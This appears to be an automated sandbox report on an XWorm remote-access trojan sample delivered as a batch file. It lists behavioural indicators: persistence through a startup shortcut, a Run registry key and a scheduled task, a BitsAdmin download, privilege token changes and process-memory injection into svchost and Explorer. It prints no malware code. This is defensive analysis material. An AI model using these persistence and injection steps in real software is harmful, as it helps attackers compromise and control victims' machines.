Malware Analysis Report

2024-11-16 13:40

Sample ID 240601-bnwk4sdc65
Target Stand.Handler.bat
SHA256 152c7242abce7287170a4025def239d75c3c294e0710f7073f6bbb25abc31c44
Tags
xworm execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

152c7242abce7287170a4025def239d75c3c294e0710f7073f6bbb25abc31c44

Threat Level: Known bad

The file Stand.Handler.bat was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence rat trojan

Detect Xworm Payload

Xworm

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Drops startup file

Adds Run key to start application

Looks up external IP address via web service

Drops file in System32 directory

Enumerates physical storage devices

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of UnmapMainImage

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

Creates scheduled task(s)

Modifies registry class

Suspicious use of WriteProcessMemory

Download via BitsAdmin

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-01 01:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 01:17

Reported

2024-06-01 01:20

Platform

win11-20240419-en

Max time kernel

149s

Max time network

152s

Command Line

C:\Windows\system32\svchost.exe -k DcomLaunch -p

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Run\Stand = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Stand.exe" C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Stand C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Bits-Client%4Operational.evtx C:\Windows\System32\svchost.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3624 wrote to memory of 4552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3624 wrote to memory of 4552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3624 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3624 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2180 wrote to memory of 1200 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2180 wrote to memory of 1200 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2180 wrote to memory of 4808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 2180 wrote to memory of 4808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4808 wrote to memory of 1708 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4808 wrote to memory of 1708 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1708 wrote to memory of 2276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1708 wrote to memory of 2276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1708 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1708 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3412 wrote to memory of 3304 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3412 wrote to memory of 2752 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 1596 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 3412 wrote to memory of 1168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 2544 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 1948 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 2536 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 1352 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 1940 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 3412 wrote to memory of 2712 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 3412 wrote to memory of 1724 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 2704 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 1304 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 3468 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 1492 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 3412 wrote to memory of 900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 3412 wrote to memory of 1092 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 3060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 1252 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 3412 wrote to memory of 1480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 3444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 488 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 1860 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 1268 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 3412 wrote to memory of 1064 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 3412 wrote to memory of 1776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 3412 wrote to memory of 4404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 4008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 4400 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 1488 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 1880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 3412 wrote to memory of 5068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 2224 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 3412 wrote to memory of 2012 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 3412 wrote to memory of 1220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 2392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 3412 wrote to memory of 2584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 2188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 936 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 3560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 3412 wrote to memory of 1588 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 3412 wrote to memory of 404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
